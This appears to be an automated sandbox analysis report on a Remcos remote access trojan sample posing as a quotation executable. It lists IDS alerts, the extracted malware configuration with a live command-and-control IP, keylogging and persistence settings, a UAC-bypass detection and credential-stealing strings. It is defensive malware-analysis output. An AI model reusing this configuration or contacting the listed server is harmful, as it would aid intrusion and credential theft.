Timestamp:	05/03/24-13:16:08.720498
SID:	2032777
Source Port:	4445
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.8 - Destination IP: 172.245.208.13

Timestamp:	05/03/24-13:13:40.463525
SID:	2032776
Source Port:	49708
Destination Port:	4445
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Found malware configuration

Source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "172.245.208.13:4445:0", "Assigned name": "JONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R7QS5C", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: 172.245.208.13

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\svchost.exe	Virustotal: Detection: 48%			Perma Link

Multi AV Scanner detection for submitted file

Source: QUOTATION#30810.exe	ReversingLabs: Detection: 57%
Source: QUOTATION#30810.exe	Virustotal: Detection: 48%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		26_2_00433837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		45_2_00433837

Source: svchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_3b33a0c1-3

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770951803.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770441759.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770666779.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770897911.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1770638691.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION#30810.exe PID: 4508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmstp.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\macatsxh.inf, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\54bmrp0l.inf, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\xrlumlnf.inf, type: DROPPED

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004074FD _wcslen,CoGetObject,		26_2_004074FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004074FD _wcslen,CoGetObject,		45_2_004074FD

Source: QUOTATION#30810.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.PDBy# source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbp^ source: WER5A3A.tmp.dmp.48.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb. source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb(System.Object, System.Object[], System.Signature, Boolean) source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbOneDrive=C:\Users\user\OneDriveh source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbn source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbme.Int source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbh source: WER1988.tmp.dmp.29.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB0 source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb:n source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: st.PDB source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	20_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10006580 FindFirstFileExA,	20_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	26_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	26_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	26_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	26_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0044E879 FindFirstFileExA,	26_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	26_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040783C FindFirstFileW,FindNextFileW,	26_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	26_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	26_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	26_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0040AE51 FindFirstFileW,FindNextFileW,	32_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	39_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	45_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	45_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0044E879 FindFirstFileExA,	45_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	45_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040783C FindFirstFileW,FindNextFileW,	45_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	45_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	45_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	45_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

26_2_00407C97

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.8:49708 -> 172.245.208.13:4445
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 172.245.208.13:4445 -> 192.168.2.8:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 172.245.208.13

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 172.245.208.13 172.245.208.13
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.208.13

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

26_2_0041B380

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: vbc.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 0000001F.00000002.3658907381.0000013DBB6AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658481481.0000013DBB600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv32CD.tmp.32.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000001F.00000003.1815397781.0000013DBB12B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-
Source: svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
